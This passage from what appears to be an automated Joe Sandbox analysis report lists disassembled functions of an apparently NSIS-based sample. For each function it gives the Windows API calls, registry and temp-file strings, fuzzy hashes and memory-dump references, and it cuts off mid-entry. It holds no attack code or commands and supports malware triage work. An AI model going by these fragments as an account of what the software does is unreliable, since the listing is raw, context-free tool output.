Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98

Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
wsprintfW.USER32 ref: 00404B52
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

6B, xrefs: 00404B3B
%u.%u%s%s, xrefs: 00404B33

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsr797A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsr797A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsr797A.tmp, xrefs: 004025E1
C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr797A.tmp$C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll
API String ID: 3109718747-2156818374
Opcode ID: d16774647d0c3b57a9c0354c15aa2feef0a14e9a17d8eebea2b137cd7cb3cc12
Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
Opcode Fuzzy Hash: d16774647d0c3b57a9c0354c15aa2feef0a14e9a17d8eebea2b137cd7cb3cc12
Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E

Function 70172398 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 701724DA

Part of subcall function 7017122C: lstrcpynW.KERNEL32(00000000,?,701712DF,00000019,701711BE,-000000A0), ref: 7017123C

GlobalAlloc.KERNEL32(00000040), ref: 70172460
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7017247B

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 252a1b38859c3880f0b89beb088dd3198a686733379611ce52d00bd0a9446726
Instruction ID: 978a5d018548a9f7285feab5afb503fdca2b88e997662bba87fc3cb4d2d51f04
Opcode Fuzzy Hash: 252a1b38859c3880f0b89beb088dd3198a686733379611ce52d00bd0a9446726
Instruction Fuzzy Hash: D141BDB1008305EFC3209F25DC44A6E77B8FB58310B21E9ADF687C7A51E774A986DB61

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D

Function 70171621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701721F0,?,00000808), ref: 70171639
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,701721F0,?,00000808), ref: 70171640
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701721F0,?,00000808), ref: 70171654
GetProcAddress.KERNEL32(701721F0,00000000), ref: 7017165B
GlobalFree.KERNEL32(00000000), ref: 70171664

Memory Dump Source

Source File: 00000000.00000002.42445740510.0000000070171000.00000020.00000001.01000000.00000004.sdmp, Offset: 70170000, based on PE: true

Associated: 00000000.00000002.42445700312.0000000070170000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445795216.0000000070173000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.42445848499.0000000070175000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70170000_Fac.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 290a7371b5e16f752a080898d05f773555159150cddca712111f8e45c8e2c782
Instruction ID: 4ec5029b0ddace043aa8bfbee41f932611bffdd30f66b08467ce44a16204d3a7
Opcode Fuzzy Hash: 290a7371b5e16f752a080898d05f773555159150cddca712111f8e45c8e2c782
Instruction Fuzzy Hash: 07F0AC732061387BD62117A78C4CD9BBE9CDF8B2F5B210215F628925A096619D41DBF1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
Opcode Fuzzy Hash: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr797A.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr797A.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr797A.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsr797A.tmp, xrefs: 00402420, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsr797A.tmp
API String ID: 2655323295-1787437957
Opcode ID: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
Opcode Fuzzy Hash: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68

Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77293420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC

Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040528F
CallWindowProcW.USER32(?,?,?,?), ref: 004052E0

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Strings

, xrefs: 00405270

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69

Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll), ref: 004061A3

Strings

Call, xrefs: 00406159

Memory Dump Source

Source File: 00000000.00000002.42427967990.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.42427914483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428023075.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428078900.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Fac.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4

Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
CloseHandle.KERNEL32(?), ref: 004058A3

Strings

Error launching installer, xrefs: 00405880

Memory Dump Source

